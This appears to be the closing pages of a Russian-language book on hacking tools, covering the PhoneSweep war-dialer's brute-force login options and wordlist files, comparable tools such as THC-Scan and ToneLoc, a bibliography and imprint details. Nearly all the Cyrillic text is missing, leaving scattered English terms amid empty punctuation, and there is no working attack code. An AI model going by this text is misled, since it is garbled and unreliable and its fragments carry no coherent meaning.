Penetrate Level Options ( )
, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
,
Maximum Calls
Per Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 11.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.
largebruteback.txt: ,
largebrute.txt, .
, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
, PhoneSweep - ,
, .
- THC-Scan ToneLoc
,
. , - Login Hacker (
, , [3]). ,
, ...
- -
.
, , TeleSweep Secure
(http://www.securelogix.com) Secure Logix. However, [14], TeleSweep Secure
- , .
, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .
, , , .
1. 2000-2003 .
2.
.. - .: -, 2001. - 624 .: .
3.
- ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5.
. .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.
Alex JeDaev . - .:
, 2002 - 432 .: .
8.
9.
.. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
- .: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
.;
'
'
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .
( , , , - 3000, 25 )
, Alex Atsctoy.
.
.. .
.. .
. 125438, . , / 18.
00033 10.08.99 .
- 12.01.2005 .
70100'/|- . . . 12.
5830.
3 500 .
143200, . , . , 93
www.3st.ru
ISBN 5-93673-036-0
: (095) 720 07 65
E-mail: opt@triumph.ru